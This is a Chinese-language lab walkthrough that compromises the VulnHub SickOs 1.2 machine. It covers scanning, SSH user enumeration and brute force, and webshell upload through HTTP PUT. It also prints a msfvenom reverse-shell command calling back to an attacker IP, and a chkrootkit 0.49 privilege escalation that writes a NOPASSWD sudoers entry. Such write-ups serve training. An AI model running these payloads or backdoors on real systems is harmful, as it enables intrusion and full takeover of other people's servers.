kali滲透綜合靶機(十二)--SickOs1.2靶機php
靶機下載地址:https://www.vulnhub.com/entry/sickos-12,144/html
1、主機發現web
1.netdiscover -i eth0 -r 192.168.10.0/24shell
2、端口掃描瀏覽器
1. masscan --rate=10000 -p0-65535 192.168.10.170服務器
3、端口服務識別session
1. nmap -sV -T4 -O -p 22,80 192.168.10.170ssh
4、漏洞查找與利用curl
1.瀏覽器訪問http://192.168.10.170,發現發現登陸界面,嘗試目錄掃描,沒發現有用信息tcp
2.發現http://192.168.10.170/test/
3.發現ssh的版本OpenSSH 5.9p1,存在用戶枚舉漏洞,用msf枚舉用戶獲得用戶John, root
4.使用hydra進行ssh爆破,沒有破解出來
5.發現web服務的版本lighttpd 1.4.28
searchsploit lighttpd,搜索漏洞,發現沒有什麼可利用的漏洞
6. nmap 192.168.10.170 --script=http-methods.nse --script-args=http.methods.url-path="/test" 掃描/test頁面的支持的http方法
或者對/test頁面抓包,而後修改請求頭爲OPTIONS查看支持的HTTP方法
7. 上傳了一個html文件進行測試,發現真的上傳成功了(上傳一個不存在的文件會響應201 Created)
Getshell方式一:
8.上傳php一句話
9.菜刀鏈接一句話
10.在菜刀中上傳php反彈shell,反彈鏈接的IP以及端口,端口設置爲443(防火牆阻止了很是用端口出去)
11.查看系統版本和內核版本
Getshell方式二:
1.Msfvenom生成一個反彈shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.168 LPORT=443 > shell_443.php
2.curl上傳生成的反彈shell到目標
3.Msf開啓監聽
4.訪問上傳的shell
5.得到目標的shell
提權方式一:利用exp
1.查看系統是否存在chkrootkit,發現chkrootkit的版本爲0.49
2. chkrootkit 0.49漏洞原理:chkrootkit有crontab,會按期以root身份執行/tmp/update文件。若是攻擊者知道管理員是按期運行chkrootkit(經過查看cron.daily獲知),而且對/ tmp(沒有掛載noexec)有寫訪問權限,就能夠利用該漏洞獲取root權限。
漏洞利用: 因而咱們能夠利用這一點,在/tmp目錄下新建update文件,作咱們想讓root幫咱們作的事
touch /tmp/update
chmod +x /tmp/update
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
sudo su root
提權方式二:
1.exploit-database中對漏洞chkrootkit進行搜索
2.msf中利用對應的漏洞結合已經得到的session
3.使用exploit/unix/local/chkrootkit模塊本地提權,設置參數
4.開始攻擊,成功,得到管理員權限
提權方式三:
1.編寫exp
2.上傳exp到目標靶機
3.把上傳的腳本拷貝到/tmp目錄下
4.執行update,得到root權限
總結:
一、信息收集、端口掃描、服務識別、目錄掃描
二、nmap 的http-methods.nse腳本得到目標支持的http方法,發現/test頁面支持put方法
三、使用burp修改包,用put方法上傳一句話或者curl 上傳得到shell
四、利用chkrootkit版本0.49按期以root身份執行/tmp/update文件來提權。
1.利用msf中chkrootkit攻擊模塊
2.手動建立在/tmp建立update文件,而後利用自動執行update文件,在update寫入添加帳戶到sudo組
3.使用C語言編寫exp,改變/tmp的所屬組爲root以及增長uid爲root權限,上傳都目標服務器,編譯而後執行,提權成功。